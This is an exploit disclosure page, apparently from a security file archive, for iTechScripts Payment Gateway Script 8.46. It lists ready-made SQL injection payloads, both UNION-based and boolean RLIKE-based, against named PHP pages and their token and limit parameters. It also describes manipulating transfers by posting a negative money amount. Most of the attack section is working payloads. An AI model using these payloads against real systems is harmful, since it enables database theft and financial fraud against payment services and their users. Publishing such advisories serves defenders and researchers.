iTechScripts Payment Gateway Script 8.46 SQL Injection

iTechScripts Payment Gateway Script 8.46 SQL Injection: Posted Jan 18, 2017; Authored by Hasan Emre Ozer; iTechScripts Payment Gateway Script version 8.46 suffers from multiple remote SQL injection vulnerabilities.; tags | exploit, remote, vulnerability, sql injection; SHA-256 | 823d7beb69eabd38cf5eb4a921317bf50edd69150bbb0db67ff3ac9e8222b9ba; Download | Favorite | View

iTechScripts Payment Gateway Script 8.46 SQL Injection

Exploit Title : Payment Gateway Script v8.46 - Multiple Vulnerability
Author : Hasan Emre Ozer
Google Dork :    -
Date : 18/01/2017
Type : webapps
Platform: PHP
Vendor Homepage : http://itechscripts.com/payment-gateway-script/
<http://itechscripts.com/image-sharing-script/>
Sofware Price and Demo : $400
http://payment-gateway.itechscripts.com
<http://photo-sharing.itechscripts.com/>

------------------------------------------------------

Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/user-profile.php
Vulnerable Parameters: token
Method: GET
Payload: -3519' UNION ALL SELECT
NULL,NULL,CONCAT(0x7170767871,0x6850685261566a4d586d544e68636d7458684a7943657a70704f697a6767734c4c50654b495a5770,0x716a7a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
------------------------------------------------------
Type: IDOR
Vulnerable URL: http://localhost/[PATH]/send-money-confirm.php
Vulnerable Parameters: t_amount and t_paid
Method: POST
Payload: negative money value (ps:-1350)
------------------------------------------------------

Type: Boolean Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/netbank_historyDetails.php
Vulnerable Parameters: token
Method: GET
Payload: ' RLIKE (SELECT (CASE WHEN (6762=6762) THEN
0x343034306334636134323338613062393233383230646363353039613666373538343962
ELSE 0x28 END))-- BxvH
------------------------------------------------------

Type: Boolean Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/netbank_histPrew.php
Vulnerable Parameters: token
Method: GET
Payload: ' RLIKE (SELECT (CASE WHEN (6762=6762) THEN
0x343034306334636134323338613062393233383230646363353039613666373538343962
ELSE 0x28 END))-- BxvH
------------------------------------------------------
Type: Boolean Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/overview.php
Vulnerable Parameters: limit
Method: GET
Payload: ' RLIKE (SELECT (CASE WHEN (6762=6762) THEN
0x343034306334636134323338613062393233383230646363353039613666373538343962
ELSE 0x28 END))-- BxvH


-- 
Best Regards,
Hasan Emre

Top Authors In Last 30 Days

Red Hat 234 files
indoushka 108 files
Ubuntu 87 files
Gentoo 36 files
Jasper Nota 25 files
Debian 20 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,100)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,789)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,546)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,754)
UNIX (9,437)
UnixWare (187)
Windows (6,674)
Other

iTechScripts Payment Gateway Script 8.46 SQL Injection

iTechScripts Payment Gateway Script 8.46 SQL Injection

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

iTechScripts Payment Gateway Script 8.46 SQL Injection

Share This

iTechScripts Payment Gateway Script 8.46 SQL Injection

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems